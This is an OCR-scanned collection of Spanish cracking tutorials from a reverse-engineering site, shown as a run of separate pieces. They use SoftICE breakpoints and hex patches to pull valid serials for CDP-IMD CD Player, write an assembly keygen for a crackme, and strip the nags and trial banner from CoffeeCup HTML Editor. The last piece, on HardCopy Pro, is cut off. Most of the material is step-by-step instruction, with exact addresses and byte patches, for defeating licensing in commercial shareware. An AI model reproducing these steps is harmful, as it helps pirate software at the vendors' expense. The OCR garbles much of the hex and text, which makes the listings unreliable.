registration accepted. thank you very much. 


1. el registro que da guardado en x:1windows en un archivo llamado wh2k.dat . 


2. al desensamblar el programa se ve esta cadena: "ljbepc- ", jejeje :), que protección más mala... :) 


programa crackeado... 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoUhotmail. com 


saludos 


e profesor x 
e [dek_oin ] 
e txeli 

e Kuato_thor 
e Crkviz 

e code_mex 
e metamorfer 
e txotxo 

e turbop 


e karpoff http:/ / welcome.to/karpoff 


e xasx de tnt! http://www.tntcrackers. ws 


e Viper ( creador de file inspector ) file inspector web site http://www. finspec.swsites. net/ index. htm 


e toda la people de tutoriales2000. 


e saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


22/12/00 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria inversa y 
programacion. email "colabora con tus proyectos" 


CDP - IMD CD Player v1.02 


Protección: Serial 
Descripción: Programa musical 


introducción 


hola amigos, presento mi décimo noveno tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoGhotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras 
cosas. en este tutorial usaremos el softice. si no lo tienes instalado puedes bajártelo en www.crackstore.com . 
asumo que tienes conocimientos básicos sobre su uso. y para terminar con la intro debo decir : este texto ha sido 
escrito sólo con propósitos educacionales. 


comentario del programa 


e Cd player para windows. 

e Opciones: 
o multiples contadores y referencias en pantalla. 
o acceso inmediato a las pistas mediante caja-track. 
o acceso inmediato a las pistas mediante menz. 
o barra de acceso a cualquier parte de la pista. 
o avanze y retroceso con inercia. 
o múltiples opciones. 
o modo shade (mini-player). 
o en dos idiomas (inglis/ espagol). 
o buen aspecto. 
o gran facilidad de uso. 


lo que nos interesa...el programa es shareware con libre uso de 30 días y para registrarse hay que pagar $8 us. 


contamos con softice :) ... 


antes de abrir el programa lo analizamos con file inspector v3.5 el que nos mostrará información realmente importante a la 
hora de atacar el programa; bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en bordland delphi 3.0 
e no está empacado 


a continuación... cerramos file inspector v3.5 y abrimos cdp-imd cd player v1.02 


abrimos el programa, nos vamos al botón ? (sobre...) y luego presionamos el botón registrarse, y ahora estamos en la caja 
de registro la que nos pide los siguientes datos: 


nombre: 
número de serie: 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a registrarse y por supuesto que el programa 
no aceptará el código de registro y nos mostrará un mensaje como este... 


registro inválido. 


a continuación... cerramos cdp-imd cd player v1.02 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos cdp-imd cd player y vamos directamente a la caja de registro en donde introducimos nuestro 
nombre, y cualquier código de registro. todavía no damos click en registrarse ; lo que ahora debemos hacer es presionar 
control+d para que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a registrarse y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez y f12 11 veces para caer aquí... 


:0045ce77 8b45£8 mov ax, [ebp-08]<-- caemos aquí, seguimos con f10 
:0045ce7a 8d55bfc lea edx, [ebp-04] 

:0045ce7d e8766£0000 call 00463df8 

:0045ce82 8d55f4 lea edx, [ebp-0c] 

:0045ce85 a1l44894700 mov eax, [00478944] 

:0045ce8a 8b80f0020000 mov eax, [eax+000002£0] 

:0045ce90 e873d4fcff Call 0042a308 

:0045ce95 8b55f4 mov edx, [ebp-0c] 

:0045ce98 8b45fc mov ax, [ebp-04] <-- d edx =nuestro registro falso 
:0045ce9b e8ec6ffaff call 00403e8c <-- d eax = nuestro registro válido 
:0045cea0 0f8503010000 jnz 0045cfa9 <-- salto bueno, comprobable con r fl z 
:0045cea6 8b45fc mov eax, [ebp-04] 


al colocar d eax en la call 0045ce9b tendremos nuestro código de registro válido, en mi caso la caja quedaría así... 
name: act mago 
serial? 19d111111111111 


le damos click a registrarse y... 


registro correcto. 


nota: por lo que pude ver también se puede registrar el programa infotel v3.31.00 de la misma compañia usando el 
método que acabo de mostrar. 


programa crackeado... 
nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoUhotmail. com 


saludos 


e profesor x 

e [dek_oin ] gracias por el dato :) 
e txeli 

e Kuato_thor 

e Crkviz 

e code_mex 

e metamorfer 

e txotxo 

e raziel 

e turbop 


e karpoff http://welcome.to/karpoff 


e xasx de tnt! http://www.tntcrackers. ws 


e Viper ( creador de file inspector ) file inspector web site http://www. finspec.swsites. net/ index. htm 


e toda la people de tutoriales2000. 


e saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria inversa y 
programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Tutorial sobre Delphy CrackMe 2.d 


Protección: Anti-Win32Dasm, Anti-FrogSice, posible Encriptacion y Serial 
Descripción: Programa cuya unica finalidad es ser crackeado 
Dificultad: Aficionado 


Download: http://www, 2Sweeet.tsx.org 


Herramientas: Sofl ce, papel y boli € Tasm v5.0 


Cracker: Mr.Burns 01/01/2001 


introducción 


hola de nuevo a todos!!! espero que mi demora en el mundillo de los tutoriales no haya sido tan grande. ante la 
falta de tiempo, mis proyectos underground se ven retrasados, pero gracias a este puente, os podre “deleitar” con 
otro tutorial mas. 


antes de nada explicar que el crackme ha sido creado por 2sweeet, no lo conozco pero he visto trabajos suyos y, la 
verdad, me han parecido bastante majos. 


despues de tanto sentimentalismo creo que deberiamos empezar con el trabajo, el cual me ha gustado hacer ;-) 


comenzamos ejecutando el crackme. observamos que tenemos 3 editbox para introducir nuestros datos, y tres botones: 


“register”, “close” y“about”. bueno, introducimos nuestros datos y apretamos “register”, veremos que abajo de la win nos 
pone “status: wrong code”, vaya!!! parece que no he acertado en el serial xddddd 


una vez estudiado como funciona el crackme haremos lo siguiente: 


12. ejecutamos el win32dasm y lo desensamblamos... pero... en la direccion 41fcbc éste se nos cuelga. esto quiere decir que 
hay dos posibilidades: esta empakado y/o encriptado o tiene anti-desensamblador. yo voto por el anti-desensamblador 
porque el tamaño del crackme no es muy pequeño que digamos. 


22. como no nos ha rulado, seguiremos probando con el ida pro a ver si sus protecciones anti-desensamblador se las puede 
saltar... pero tampoco nos rula. este nos indica que no puede abrirse. :( 


32. ejecutaremos el procdump para ver si esta encriptado el dichoso programiilla de los ..... ;-) pero... tampoco funciona, al 
abrir el crackme a traves de el “pe editor” no avisa con una frase como esta “error while accesing the file (read/write)”. 


42. nos aferraremos a la unica posibilidad que tenemos: el softice (sice). abrimos el crackme y rellenamos nuestros datos: 
username: mr_burns 
company: k-for 
key-string: 12345678 


al rellenar el serial nos daremos cuenta que tan solo nos deja introducir 8 caracteres. hmmmml!!! esto me esta dando una 
pistas preciosas... el serial puede que este en hexadecimal!!! 


despues de esta deduccion, nos metemos en el sice (control + d) y metemos un bpx hmemcpy, y salimos de nuevo al 
crackme para apretar el boton “register”. inmediatamente saltamos al sice, de nuevo. quemamos la tecla f12 hata llegar a la 
direccion 442291 donde observamos que eax = username. 


auna vez aqui seguiremos dos caminos: uno sacar un serial valido; y una vez conseguido esto buscar la rutina de generacion 
del serial. 


— obtencion del serial - 


a medida que traceamos vemos algo como esto: 
mov eax,[ebp-04] <--- eax = nombre 
call 403bf8 <--- comprueba que haya algo escrito, osea difrente de O 
call 407904 <--- capta el n2 de letras que posee el nombre 

mov ecx,eax <--- ecx = n£ de letras 
mov edi, 1 
mov eax, 1 

cmp eax,ecx <--- comprueba que el nombre sea mayor que 1 sino... error 


ja 4422bd 


despues de haber comprobado que el nombre es correcto y haber sido guardado, realiza exactamente la misma operación 
con la compañía. tracenado mas sobre el codigo vemos que realiza una serie de opreciones... hasta llegar a un salto 
sospechoso en 442293 donde aparece: 


mov edx,[ebp-18] <--- nuestro serial (12345678) 


call 403b44 <--- compara los serial 
jz 4425ac <--- salta si son iguales 
espero no tener que deciros que para ver el serial verdadero teneis que poner “d eax” ;-) 


como podreis ver, llegar a descubrir el serial es extremadamente facil. una vez apuntado nuestro serial salimos del sice y lo 
comprobamos para ver si ese es el verdadero, no hace falta que os diga que si que lo es xdddd 


ahora iremos a por el keygen!!! 


— realizacion del keygen E 


una vez obtenido el serial correcto, nos dedicaemos a un estudio mas en profundidad sobre el codigo, para captar el 
generador de llaves. asi que volvemos a ejecutar el crackme, introducimos los datos, entramos en el sice, ponemos le bpx 
hmemcpy, salios del sice, apretamos “registrar”, y vamos de nuevo a la direccion 442291. alli podremos observar lo siguiente: 


mov eax,[ebp-04] <--- eax = nombre 
call 403bf8 <--- comprueba que haya algo escrito oase difrente de O 
call 407904 <--- capta el n2 de letras que posee el nombre 
mov ecx,eax <--- ecx = n£ de letras 
mov edi, 1 
mov eax, 1 
cmp eax,ecx <--- comprueba que el nombre sea mayor que 1 sino... error 
ja 4422bd 
mov edx,[ebp-04] <-- edx apunta a la nombre 
movzx edx, byte ptr [eax+edx-01] <-- edx = carácter de la nombre 
inc eax <-- eax + 1 
add edi,edx <-- edi + edx 
cmp eax,ecx <-- compara eax con ecx 


jbe 4422ae <-- si eax > ecx realiza de nuevo la operacion 


lea edx,[ebp-Oc] 
mov eax,[ebx+2cC8] 
Call 423224 


una vez terminado el bucle que trabaja con el username (en mi caso mr_burns) tenemos guardado un numero en edi que 
usara mas adelante, para poder verlo introducimos “? edi” (en mi caso sera 809). despues de haber trabajado con el 
username, va a por el company: 


mov eax,[ebp-0Oc] <-- eax apunta a la compañia 

call 403bf8 <-- comprueba que halla escrito algo 

Call 407904 <-- n2 de caracteres de la compañia 

mov [ebp-08],eax <-- [ebp-08] = n* de caracteres de la compañia 

mov esi, 1 
mov eax, 1 

cmp eax,[ebp-08] <-- compara eax con [ebp-08] 

ja 4422fa <-- si eax > [ebp-08] error! 
mov edx,[ebp-Oc] <-- edx apunta a la compañia 
movzx edx, byte ptr [eax+edx-01] <-- edx = carácter de la compañia 
inc eax <-- eax + 1 
add esi,edx <-- esi + edx 
cmp eax,[ebp-08] <-- compara eax com [ebp-08] 
jbe 4422ea <-- si eax > [ebp-08] realiza de nuevo la operacion 


espero que os hallais dado cuenta que realiza exactamente la misma operación con la compañía (en mi caso k-for) y que el 
resultado de esa serie de operaciones esta guardado en esi, para poder verlo poneis “? esi” (en mi caso sera 384) 


despues de esto hay una serie de operaciones a las que no debemos hacer caso, asi que tracearemos hasta llegar a la 
direccion 442351, donde veremos: 


lea eax,[edi+esi] <-- eax = edi + esi 
imul eax,eax, 12h <-- 
mov [ebp-10],eax <-- [ebp-10] = eax 
mov eax,[ebp-10] <-- viceversa 
imul dword ptr [ebp-10] <-- eax * [ebp-10] 
imul edi <-- multiplicacion por edi 


mov [ebp-10],eax <-- [ebp-10] = eax 


sub [ebp-10],esi <-- [ebp-10] - esi = serial correcto!!! 


al final de esta serie de operaciones tenemos en [ebp-10] un numero un tanto atractivo... ¿y sabeis porque? pq el numero es 


mayoria de las veces se trabaja en decimal para luego pasarlo a otra base. asi que ya estaba todo solucionado... ahora habia 
que hacer el keygen en asm. 


con todos los comentarios que he puesto en el tutorial no creo que os resulte dificil hacel el keygen en cualquier otro 
lenguaje, y para los que sabemos programar en asm esto no es nada ya que tan solo hay que copiar. como el tamaño de 
este tutorial ha sobrepasado mis intenciones os pondre tan solo el codigo comentado (como hago siempre) y nada mas, aun 
asi si teneis cualquier tipo de duda, mandadme un mail. 


¿delphi crackme 2.d keygen 
¿coded by mr burns [k-for] 


;date: 4-12-2000 


«model tiny 
.code 
.386 


org 100h 


start: jmp letsrock 


intro db 10,13,'delphi crackme 2.d keygen coded by mr. burns [k-for]' 
db 10,13,'the crackme is written by 2sweeet' 
db 10,13,'websites: http://go.to/mr_burns/' 
db 10,13,' http: //kfor.cjb.net/',10,13 
db 10,13,'enter your username: ' 
nombre db 50,0 
nombre2 db 50 dup(0) 

companyout db 10,13,'enter your company: $' 

company db 25,0 


company2 db 25 dup(0) 


serialout db 10,13,'your key-string is: ' 
serial db 9 dup(0) 
serialend db 10,13,'$' 
tempserial db 9 dup(0) 


tempserialend db O 


letsrock: 
mov ah,09h ;introduce un texto por pantalla 
lea dx, intro 


int 21h 


mov ah,0ah ;lee el nombre introducido 
lea dx,nombre 


int 21h 


mov edi, 1 ¡edi 


Il 
p 


mov eax,1 ;eax 


nameloop: 
lea edx,nombre2 ;edx apunta al nombre 
movzx edx,byte ptr [eax+edx-1] ;edx caractrer del nombre 
inc eax ;eax + 1 
add edi,edx ;edi + edx (resultado en edi) 
cmp eax,ecx ;compara eax con ecx 


jbe nameloop ¡si eax < ecx salta 


mov ah,09h ;saca un texto por pantalla 
lea dx, companyout 


int 21h 


mov ah,0ah ;lee la compañia 
lea dx, company 


int 21h 


mov esi,1 ¡esi = 1 


mov eax,1 ;eax = 1 


companyloop: 
lea edx,company2 ;edx apunta a la compañia 
movzx edx,byte ptr [eax+edx-1] ;edx = caracter de la compañia 
inc eax ;eax + 1 
add esi,edx ;esi + edx (resultado en esi) 
cmp eax,ecx ; compara eax con ecx 


jbe companyloop ;si eax < ecx salta 


mov ecx,edi ;ecx = edi 
add edi, esi ;edi + esi 
mov eax,edi ;eax = edi 


imul eax,eax,1f2h ; 


mov ebx,eax ;ebx = eax 


mov eax,ebx ;eax = ebx 


imul ebx ;* ebx 


mov edi,ecx ¡edi = ecx 
imul edi ;* edi 
mov ebx,eax ;ebx = eax 
sub ebx, esi ;ebx - esi = serial en decimal 


mov eax,ebx ;eax = ebx = serial 


hex_convert: ;rutina que convierte el numero decimal 
lea esi,tempserialend-1 ;a hexadecimal y que no voy a comentar. 


mov edx,4 


loopy: 
xor ebx,ebx 
mov bl,al 
movzx ebx, bl 
and bl,Ofh 
add bl, 30h 
cmp bl,39h 
jle ok1 
add bl, 7 
mov byte ptr [esil,bl 
dec esi 


jmp part2 


okl: 
mov byte ptr [esil,bl 


dec esi 


part2: 


mov bl,al 


movzx ebx, bl 


shr bl, 4 


add bl,30h 


cmp bl,39h 


jle ok2 


add bl, 7 


mov byte ptr [esil,bl 


dec esi 


jmp part3 


ok2: 


mov byte ptr [esil,bl 


dec esi 


part3: 


shr eax,8 


dec edx 


jnz loopy 


convertdone: 


inc esi 


lea di,serial 


copynumber: 
movsb 
cmp byte ptr [esi],0 


jne copynumber 


mov ah,09h 
lea dx, serialout 
int 21h 
mov ah,4ch 


int 21h 


: end start 


— agradecimientos y despedidas - 


antes de marcharme me guataria saludar a todos los miembros del grupo k-for, en especia a viper y a prexfesor x... y me 
gustaria saludar tambien a todos los componentes del canal Hcrackers. 


espero volver a veros pronto por aquí, aunque todo depende del tiempo que tenga. 


como siempre digo en mis tutoriales, si deseais hablar conmigo buscad en: 


nick servidor Canal 
mr_burns irc.irc-hispano.org crackers 
[mordred] irc.chat.org tntcrackers é: wkt 


O por el contrario si tan solo deseas mandarme un e-mail: mr_burns_kfortdhotmail.com 


http://go.to/mr_burns/http://mr_burns. go.to/http: //mrburns.da.ru/ 


http://pagina.de/kforhttp://kfor.cjb.net 


| “la ignorancia no es una es una excusa, es una opción.” 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria inversa y 


programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: CoffeeCup Html Editor v8.7 


PROTECCION: Trial de 30 días. 

Descripcion: Pe 
Dificultad: Principiante 

DOWNLOAD : MO E 
Herramientas: | Softice, Wdasm, Editor Hexa, DeDe, ExeScope 


CRACKER: KuaTo_ThoR FECHA: 10/12/2000 


introduccion 


otra vez aquí amigos. esta vez con un editor htm, el coffeecup. el programa está bastante bien, y la protección, 
bueno... eso ya lo veréis vosotros mismos, nos divertiremos un rato. 


el wdasm y el dede los utilizaremos para localizar pistas, o puntos calientes que nos faciliten el trabajo, pero no son 
imprescindibles, aunque sí aconsejables. 


el exescope ya veréis para que es. :-) 


al atake 


preliminares. obtener información 


lo primero como siempre es saber de que va el tema. ejecutamos el programa, y nos recibe una bonita nag. tiene unos 
botones, pero ninguna opción de registrarnos sin conectarnos a internet. lo que podemos observar es que esta nag es una 
imagen, no es un cuadro de diálogo ni nada parecido. interesante. continuemos viendo más cosas. pulsamos start, y nos 
aparece el programa, con un banner amarillo que nos recuerda que debemos soltar los cuartos para olvidarnos de él. si 
miramos en acerca de..., podremos ver que no hay opción de registro, y también nos podemos dar cuenta de que la frase 
que está en el banner amarillo, cambia cuándo salimos de algún menú. grave error. como ya estamos artos del programa 
salimos, para analizar el archivo, pero ¡¡¡sorpresa!!! al salir nos espera otra bonita nag. esto ya empieza a cansar. también 
hay un boton para registramos y en el menú help también. el botón y el menú, se pueden quitar sin ningún problema así: 
tools->tools bar and menu->customize->nos aparece una ventanita, ahora sólo tenemos que pinchar sobre el botón y la 
referencia del menú y arrastrarlos a la ventana. fuera botones. 


pués bien, analizemos el archivo, por ejemplo con el file inspector, lo hacemos y nos dice que está compilado con delphi 4, y 
que no está comprimido ni encriptado ni nada de nada. 


recordáis lo que os dije de que la nag es una imagen, pués abramos el archivo con exescope, a ver que podemos ver. 
abrimos el archivo, vamos a resource, y seleccionamos gif. si miramos splash_s, veremos que esla nag inicial, pero ¿qué hay 


final, y en background el fondo del programa, qué si no nos gusta podemos cambiarlo. luego hay unas imagenes de mp3.com 
que no sé que será. 


bien, ya estamos preparados. 


la nag inicial 


abrimos el ejecutable (coffee.exe) con el dede. vamos a procedures y miramos a ver que vemos. por defecto miraremos 
los lugares donde aparece la palabra splash: backsplashform, splashsharewareform y frmsplash. ésta última, si 
miramos en formcreate, veremos que muestra la ventana de registrado (splash_r). 


en splashsharewareform, se forma la nag inicial, si miramos los eventos, los que empiezan con btn son botones, al 
pulasr sobre cada botón, se ejecutará el código que viene aquí. si miramos en btnstartclick, veremos que aquí se 
esconde el código que nos manda a la mierda una vez que ha expirado el programa, aunque no viene al caso. bien, 
miramos en formcreate, y apuntamos la dirección en donde acaba: 6222e9. vamos con softice. abrimos con el symbol 
loader, y ponemos bpx 6222e9 damos f5 y ... volvemos a sice (ya podemos quitar este breakpoint) ¿notáis algo raro? 
mmm... aún no ha aparecido la ventana, así que continuamos traceando con f10 hasta que salga, que será pronto, justo 
cuando llegamos a 622f94: 


00622194 ££92cc000000 call dword ptr [edx+00cc] <- aquí sale la nag 
00622f9a 83f802 cmp eax, 02 

00622f9d 7540 ¡nz 00622fdf 

00622f9f c605d632630001 mov byte ptr [6332d6], 01 

00622fa6 eb37 ¡mp 00622fdf 

00622fa8 8b0df0e16200 mov ecx, [62e1f0] 


al pulsar sobre este call, aparece la nag, pulsamos start, y volvemos al sice, podemos ver en los registros(f2) que eax = 
1. supongo que estaréis pensando lo mismo que yo ;-) ponemos un breakpoint aquí (622f94) y volvemos a iniciar el 
programa. salta sice en el call, vamos a sustituirlo por un mov eax, 01, que en bytes es b801000000, pero hay que 
darse cuenta que en esta ocasión el call son seis bytes y el mov son cinco, luego hay que meter un nop (90). en este 
ocasión vamos a editar directamente los bytes en sice, metemos en la linea de comandos e eip (en vez del usual a eip) y 
vemos que el cursor se situa en la pantalla de datos, justo en ff 92 cc 00 00 00, pués bien, los sustituimos por b8 01 00 
00 00 90 y pulsamos enter, ya hemos cambiado la instrucción, pulsamos f5 y arranca el programa, pero sin la nag!!! 
nag inicial fuera. 


nag final 


bien, esta nag es exactamente igual a la anterior, asi que os la dejo a vosotros como debres ;-) 
el banner 
esto es lo más interesante, el banner. 


bueno, lo primero es tener claro qué es lo que queremos hacer con el banner. hay varias opciones: 


ii. a la mierda con el banner. 
escoge la que más te guste, hay otras posibles opciones, pero mi tiempo es finito ;-) 


nos quedamos con el banner 


para esto vamos a utilizar wdasm. lo abrimos, y buscamos una de las frases que aparecen, por ejemplo la frase inicial: "this 
yellow banner will desapear when you buy now!" . aparecemos en esta zona, pongo lo más interesante: 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:005daa12(c) 


| 

:005daalb a1682f6300 mov eax, dword ptr [00632f68] <- asignamos un valor a eax. 

:005daa20 83f819 cmp eax, 00000019 

:005daa23 0f874e010000 ja OO5dab77 

:005daa29 ff248530aa5000 ¡mp dword ptr [4*eax+005daa30] <- saltamos a la dirección resultante de la operación 


:005daa98 8bc3 mov eax, ebx 


* possible stringdata ref from code obj ->"this yellow banner will disappear " 
->"when you buy now !" 


| 

:005daa9%a ba88ab5d00 mov edx, OO5dab88 
:005daa9f ese493e2ff call 0O403e88 
:005daaa4 e9ce000000 ¡mp OO5dab77 


bien, en la primera parte es donde selecciona la frase que nos va a sacar, dependiendo del valor de eax, lo multiplica por 4 y 
le suma 5daa30. pero si nos fijamos, en la primera línea, aquí es donde da el valor a eax, por tanto, si fijamos ahí el valor, 
podremos conseguir que la frase que aparezca sea siempre la misma, y por tanto sólo tenemos que buscar en el editor hexa 
dicha frase y cambiarla por lo que queramos. 


con softice, poniendo un breakpoint en 5daalb, podemos ver que cuando aparece la frase inicial, a eax se le asigna el valor 
O, luego sólo hay que sustituir 'mov eax, dword ptr [00632f68]' por 'mov eax, 0'. nuestra frase ya está fija. 


pero si pulsamos sobre ella aún nos enviará a la dirección de coffeecup, así que esto lo tenemos que cambiar. tambien con el 
editor hexa, por supuesto. pero si la intentamos buscar a lo bestia, es decir, con el buscador del editor, veremos que aparece 
en muchas ocasiones, así que habrá que buscarla de manera más certera. (esta parte no es imprescindible ya que podemos 
hacerlo simplemente con el editor hexa) 


vamos a utilizar una bonita utilidad, creo que se llama winspector, lo ejecutamos y nos aparece algo cómo esto al poner el 
cursor sobre el banner: 


Todos a la página de K-F 


cómo podemos ver este programa sirve también para obtener el handle de las ventanas. pero lo que nos interesa a nosotros 
es donde pone "windowtext: pnlannoy" y "parent window class name: tfrmmain". bien, ahora vamos al dede, y en 
procedures, seleccionamos frmmain, nos aparecen un montón de eventos, así que para no volvernos locos los colocamos 
por orden alfabético pulsando un par de veces sobre event y buscamos donde aparezca la palabra annoy (menudo cabrón) 
que es en Ilbnannoyclick. pulsamos un par de veces sobre el evento y nos aparece el código, entre lo que podemos ver: 


006lbe7a 33c9 xor ecx, ecx 
* possible string reference to: "http: //www.coffeecup.com" 


| 
0061be7c b890be6100 mov eax, $0061be90 


bien, aquí está nuestra dirección, OO61be90, cuyo offset debemos saber obtener, quién no sepa que mire en algún tute 
anterior mio o que me lo pregunte. bueno, el offset es 21b290. vamos allí con el editor hexa y metemos la web que más nos 
guste, yo cómo os habréis imaginado al ver la frase he puesto http://pagina. de/kfor. 


a la mierda con el banner 


bien, lo de antes nos sirve, aunque cuando llegamos a esas alturas, el banner ya está formado, ahí únicamente selecciona la 
frase que va a poner. así que nuestro problema es cómo encontrar el lugar donde crea el banner. podemos ir traceando 
desde que nos cargamos la primera nag, a la espera de que nos salte la ventana principal, ya ques cuándo esta aparece, lo 
hace ya con el hueco para el banner. pero eso es muy trabajoso, y no nos garantiza que podamos tener exito. 


vamos allá. cómo podemos ver en el código venimos de un salto condicional en 5daal2. lo primero que pensamos es invertir 
el salto y a ver que pasa, si habéis hecho el paso anterior no pasará nada, si no aparecerá una frase especial sólo para 
nosotros los crackers (esto es una suposición ;-) ), sin enlace a la página, preguntándonos si nos molesta el banner, jeje. 
bien, vayamos más atrás, a este salto hemos llegado desde un call, concretamente este: 5da9al, que si lo buscamos nos 
aparece esto: 


* referenced by a call at addresses: 
|:0060b2b5 , :006153b3 , :0061990f 


| 
:005da97c 55 push ebp 


:005da998 8b9890030000 mov ebx, dword ptr [eax+-00000390] 
:005da99e 8d45fc lea eax, dword ptr [ebp-04] 
:005da9%al e862000000 call 0O5daa08 <- este el es call 


hay tres llamadas distintas, el código donde aparecen es este: 


:00619996 es450ffcff call OO5da8e0 <-esta llamada puede ser interesante 
:0061999b 84cO0 test al, al 

:0061999d 7405 je 00619924 

:0061999f esdeoffcff call OO5da97c <- nuestra llamada 


este: 


:006153aa e83155fcff call 0O5da8e0 <- esta llamada es interesante 
:006153af 84C0 test al, al 

:006153b1 7405 je 006153b8 

:006153b3 e8c455fcff call O0O5da97c <- nuestra llamada 


y este: 


:0060b2Zac e82ff6fcff call OO5da8e0 <- esta es la llamada 
:0060b2b1 84c0 test al, al 

:0060b2b3 7405 je 0O060b2ba 

:0060b2b5 e8c2f6fcff call O0O5da97c <- nuestra llamada 


!!!! son fotocopias ¡¡¡¡ esto es un cante, las tres llamadas precedidas de un call (el mismo en las tres !!!), con lo que saca de 
él hace una comparación , y un salto condicional después, sólo falta que nos ponga "aquí, es aquí !!!" bueno, aceptaremos su 
invitación, y nos metemos en ese call, en 5da8e0. y vemos más o menos esto: 


* referenced by a call at addresses: 
|:0060b2ac , :0060dcd9 , :00614bb1 , :006153aa , :00618eba 
|:00619996 , :0061c21a , :00622f66 


| 
:005da8e0 55 push ebp 


:005da8f6 ese5fcffff call OO5da5e0 

:005da8fb 803d842f630000 cmp byte ptr [00632f84], 00 
:005da902 7404 je 0O5da908 

:005da904 33db xor ebx, ebx 

:005da906 eb02 ¡mp 005da90a 


qué os parece, hay otras cuatro llamadas más a esta dirección, interesante. vamos a poner un breakpoint en el comienzo de 
la llamada, en 5da8e0, para ver cuándo y para que se hace la llamada. damos softice y observamos las veces que nos salta 
y cuándo lo hace. vaya, antes de aparecer la ventana, lo hace tres veces. una de esas es la que nos interesa a nosotros, 
concretamente la tercera. volvemos a ejecutar el programa, y en la tercera vez que nos salta, pulsamos f11 para ver que call 
nos llamó, y aparecemos en 614bb1, aquí: 


:00614bb1 e82a5dfcff call OO5da8e0 
:00614bb6 84c0 test al, al 
:00614bb8 7454 je 00614c0e <- este es nuestro salto 


una comparación y un salto después, esto creo que me suena ;-) 


si traceamos un poco hasta el salto, podemos ver que no salta, así que lo invertimos y damos a f5... ¿dónde se metio el 
banner? ya no es tan "annoying", jeje. por tanto podemos hacer entre otras cosas estas dos: cambiar el salto condicional por 


un salto incondicional, es decir un jmp, o en lugar de la llamada poner un 'mov eax, 0' y ya está. esta elección os la dejo a 
vosotros. 


método rápido 
aquí vamos a empezar con el archivo coffee.exe original. 


con lo último que he contado antes, parece que está claro, voy a volver a poner el código de esa llamada tan interesante que 
vimos: 


* referenced by a call at addresses: 
|:0060b2ac , :0060dcd9 , :00614bb1 , :006153aa , :00618eba 
|:00619996 , :0061c21la , :00622f66 


| 
:005da8e0 55 push ebp 


:005da8f6 eses5fcffff call OOS5Sda5e0 

:005da8fb 803d842f630000 cmp byte ptr [00632f84], 00 
:005da902 7404 je OO5da908 <- aquí hay que parchear. 
:005da904 33db xor ebx, ebx 

:005da906 eb02 ¡mp O05da90a 


vaya, hay un salto condicional !!! ponemos un breakpoint ahí y vemos que pasa. si lo hacemos, veremos que realiza el salto, 
por tanto, lo nopeamos (a eip->nop y otro nop) (también: e eip-> 9090) (el eip sólo si estais sobre la intrucción, mirar el 
registro eip y sabréis porqué). pués lo dicho lo nopeamos y pulsamos f5, !!! nos aparece la nag de registrados !!! damos ok y 
nos vuelve a saltar y así sucesivamente. por tanto lo único que tenemos que hacer es ir a nuestro editor hexa y nopear el 
salto, o si no os gusta poner nops, podéis poner por ejemplo 'xor ebx, ebx' que es la siguiente instrucción. hacemos el cambio 
en el editor hexa, y ejecutamos ... todo perfecto. fin. 


conclusiones 
bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo. espero que os haya resultado útil este tute. no olvidéis que nuestro objetivo sólo es 


aprender. sin contar con la diversión que esto supone por supuesto ;-)) 


un gran saludo para todos los miembros de [k-for] (viper, raziel, leirus, txeli, profesor x, dek_oin, afa, crkviz, mr_burns, 
alambike y jkeeper) y para los amigos de tutoriales 2000 (aquí no me caben). y por supuesto para todos vosotros. 


cómo este es mi último tuto del siglo (ahora comienza el siglo, se empieza a contar por el uno no por el cero), aquí va 
un pequeño homenaje a una de las mentes más brillantes de este siglo: 


" sólo conozco dos cosas infinitas en este mundo: el universo y la estupidez humana, y de la primera no estoy muy 
seguro" 

albert einstein. 

hasta la próxima... 


«or zea y» 


mi correo: kuato_thortodhotmail. com 


la página de [k-for]: http: //pagina.de/kfor 


<p) zmézera » 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


HardCopy Pro vl1.62 


introduccion 


hola amigos, presento mi décimo sexto tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoGhotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 
en este tutorial usaremos el softice. si no lo tienes instalado puedes bajártelo en www.crackstore.com . asumo 
que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro debo decir : este texto ha 
sido escrito sólo con propósitos educacionales. 


comentario del programa 


hardcopy pro es una utilidad que sirve para capturar pantallas para windows 95/ 98/ nt 4.0 y 2000. puede capturar 
áreas de la pantalla rectangulares y las ventanas enteras. 


lo que nos importa... el programa es shareware con libre uso de 30 días por lo que si quieres seguir utilizándolo 
deberás registrarte y para eso pagar unos cuantos dólares. :( 


contamos con softice... :) 


manos a la obra 
antes de abrir el programa lo analizamos con file inspector v3.5 el que nos mostrará información realmente importante a la 
hora de atacar el programa; bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en microsoft visual c ++5.0 
e no está empacado 


a continuación... cerramos file inspector v3.5 y abrimos hardcopy pro 


